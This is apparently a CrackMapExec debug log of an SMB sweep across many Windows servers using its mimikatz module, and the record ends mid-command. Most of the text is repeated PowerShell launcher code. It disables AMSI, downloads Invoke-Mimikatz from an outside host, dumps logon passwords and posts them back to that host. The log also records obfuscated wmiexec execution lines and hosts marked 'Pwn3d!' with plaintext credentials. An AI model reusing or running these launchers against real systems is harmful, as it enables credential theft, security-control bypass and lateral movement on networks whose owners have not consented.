cme_debug
DEBUG Passed args: | |
{'content': False, | |
'cred_id': [], | |
'darrell': False, | |
'depth': None, | |
'disks': False, | |
'domain': None, | |
'exclude_dirs': '', | |
'exec_method': None, | |
'execute': None, | |
'fail_limit': None, | |
'force_ps32': False, | |
'gen_relay_list': None, | |
'gfail_limit': None, | |
'groups': None, | |
'hash': [], | |
'jitter': None, | |
'list_modules': False, | |
'local_auth': False, | |
'local_groups': None, | |
'loggedon_users': False, | |
'lsa': False, | |
'module': 'mimikatz', | |
'module_options': [], | |
'no_output': False, | |
'ntds': None, | |
'only_files': False, | |
'pass_pol': False, | |
'password': ['pass'], | |
'pattern': None, | |
'protocol': 'smb', | |
'ps_execute': None, | |
'regex': None, | |
'rid_brute': None, | |
'sam': False, | |
'server': 'https', | |
'server_host': '0.0.0.0', | |
'server_port': None, | |
'sessions': False, | |
'share': 'C$', | |
'shares': False, | |
'show_module_options': False, | |
'smb_port': 445, | |
'spider': None, | |
'spider_folder': '.', | |
'target': ['target_list'], | |
'threads': 100, | |
'timeout': None, | |
'ufail_limit': None, | |
'username': ['user'], | |
'users': None, | |
'verbose': True, | |
'wmi': None, | |
'wmi_namespace': 'root\\cimv2'} | |
DEBUG CME server type: https | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run | |
result = self._run(*self.args, **self.kwargs) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/protocols/smb.py", line 107, in __init__ | |
connection.__init__(self, args, db, host) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/connection.py", line 33, in __init__ | |
self.proto_flow() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/connection.py", line 62, in proto_flow | |
self.enum_host_info() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/protocols/smb.py", line 198, in enum_host_info | |
self.conn.login('' , '') | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smbconnection.py", line 258, in login | |
return self._SMBConnection.login(user, password, domain, lmhash, nthash, ntlmFallback) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 3365, in login | |
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 3300, in login_extended | |
smb = self.recvSMB() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 2493, in recvSMB | |
r = self._sess.recv_packet(self.__timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 854, in recv_packet | |
data = self.__read(timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 932, in __read | |
data = self.read_function(4, timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 921, in non_polling_read | |
raise NetBIOSError, ('Error while reading from remote', ERRCLASS_OS, None) | |
NetBIOSError: Error while reading from remote | |
Thu Apr 13 12:03:20 2017 <Greenlet at 0x7eff6c09ec30: smb(Namespace(content=False, cred_id=[], darrell=False, <protocol.database instance at 0x7eff7078f440>, 'COHDC01.sometarget.com')> failed with NetBIOSError | |
SMB AC29.sometarget.com 445 AC29 [*] Windows Server 2012 Standard 9200 x64 (name:AC29) (domain:TEST) (signing:True) | |
SMB JUMP.sometarget.com 445 JUMP [*] Windows Server 2012 R2 Standard 9600 x64 (name:JUMP) (domain:TEST) (signing:True) | |
SMB CQAS01.sometarget.com 445 CQAS01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CQAS01) (domain:TEST) (signing:False) | |
SMB AC51.sometarget.com 445 AC51 [*] Windows Server (R) 2008 Enterprise 6002 Service Pack 2 x32 (name:AC51) (domain:TEST) (signing:False) | |
SMB ACTSMPROX.sometarget.com 445 ACTSMPROX [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:ACTSMPROX) (domain:TEST) (signing:True) | |
SMB CDC02.sometarget.com 445 CDC02 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC02) (domain:TEST) (signing:True) | |
SMB ACDRTSM1.sometarget.com 445 ACDRTSM1 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:ACDRTSM1) (domain:TEST) (signing:True) | |
SMB SRV2.sometarget.com 445 SRV2 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV2) (domain:TEST) (signing:False) | |
SMB SRV1.sometarget.com 445 SRV1 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV1) (domain:TEST) (signing:False) | |
SMB SRV7.sometarget.com 445 SRV7 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV7) (domain:TEST) (signing:False) | |
SMB SRV3.sometarget.com 445 SRV3 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV3) (domain:TEST) (signing:False) | |
SMB TLCANISTER.sometarget.com 445 TLCANISTER [*] Windows Server 2012 R2 Standard 9600 x64 (name:TLCANISTER) (domain:TEST) (signing:False) | |
SMB CDRDC01.sometarget.com 445 CDRDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDRDC01) (domain:TEST) (signing:True) | |
SMB CDC01.sometarget.com 445 CDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC01) (domain:TEST) (signing:True) | |
SMB ACTSMAD.sometarget.com 445 ACTSMAD [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:ACTSMAD) (domain:TEST) (signing:True) | |
SMB ACTSM1.sometarget.com 445 ACTSM1 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:ACTSM1) (domain:TEST) (signing:True) | |
SMB CIVRTST02.sometarget.com 445 CIVRTST02 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CIVRTST02) (domain:TEST) (signing:False) | |
SMB CCOGNOS01.sometarget.com 445 CCOGNOS01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CCOGNOS01) (domain:TEST) (signing:False) | |
SMB CIVRTST01.sometarget.com 445 CIVRTST01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CIVRTST01) (domain:TEST) (signing:False) | |
SMB TLPORTAL.sometarget.com 445 TLPORTAL [*] Windows Server 2012 R2 Standard 9600 x64 (name:TLPORTAL) (domain:TEST) (signing:False) | |
SMB ACCOG01.sometarget.com 445 ACCOG01 [*] Windows Server (R) 2008 Standard without Hyper-V 6002 Service Pack 2 x64 (name:ACCOG01) (domain:TEST) (signing:False) | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
SMB CDC03.sometarget.com 445 CDC03 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC03) (domain:TEST) (signing:True) | |
SMB JUMPDR.sometarget.com 445 JUMPDR [*] Windows Server 2012 R2 Standard 9600 x64 (name:JUMPDR) (domain:TEST) (signing:True) | |
SMB NTISCISVR3V.sometarget.com 445 NTISCISVR3V [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:NTISCISVR3V) (domain:TEST) (signing:False) | |
SMB SRV5.sometarget.com 445 SRV5 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV5) (domain:TEST) (signing:False) | |
SMB SRV4.sometarget.com 445 SRV4 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV4) (domain:TEST) (signing:False) | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB AC29.sometarget.com 445 AC29 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB JUMP.sometarget.com 445 JUMP [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG Target system is JUMP.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\JUMP[\\PIPE\\atsvc] | |
DEBUG StringBinding: JUMP[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:JUMP.sometarget.com[49154] | |
DEBUG Target system is AC29.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\AC29[\\PIPE\\atsvc] | |
DEBUG StringBinding: AC29[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:AC29.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CQAS01.sometarget.com 445 CQAS01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
SMB ACSEPM.sometarget.com 445 ACSEPM [*] Windows Server 2012 R2 Standard 9600 x64 (name:ACSEPM) (domain:TEST) (signing:True) | |
SMB CAZDC01.sometarget.com 445 CAZDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CAZDC01) (domain:TEST) (signing:True) | |
SMB SRV6.sometarget.com 445 SRV6 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV6) (domain:TEST) (signing:False) | |
DEBUG Target system is CQAS01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CQAS01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CQAS01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CQAS01.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB AC51.sometarget.com 445 AC51 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSMPROX.sometarget.com 445 ACTSMPROX [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv uB -;sv mJ ec;sv Za ((gv uB).value.toString()+(gv mJ).value.toString());powershell (gv Za).value.toString() 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" | |
DEBUG Target system is ACTSMPROX.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSMPROX[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSMPROX[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSMPROX.sometarget.com[49154] | |
DEBUG Target system is AC51.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\AC51[\\PIPE\\atsvc] | |
DEBUG StringBinding: ac51[49155] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:AC51.sometarget.com[49155] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv EC -;sv cy ec;sv lo ((gv EC).value.toString()+(gv cy).value.toString());powershell (gv lo).value.toString() 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" | |
MIMIKATZ JUMP.sometarget.com 445 JUMP [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC02.sometarget.com 445 CDC02 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ AC29.sometarget.com 445 AC29 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Ow -;sv JC ec;sv tY ((gv Ow).value.toString()+(gv JC).value.toString());powershell (gv tY).value.toString() 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" | |
DEBUG Target system is CDC02.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC02[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC02[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC02.sometarget.com[49154] | |
MIMIKATZ CQAS01.sometarget.com 445 CQAS01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACDRTSM1.sometarget.com 445 ACDRTSM1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV2.sometarget.com 445 SRV2 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV1.sometarget.com 445 SRV1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is ACDRTSM1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACDRTSM1[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACDRTSM1[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACDRTSM1.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV7.sometarget.com 445 SRV7 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
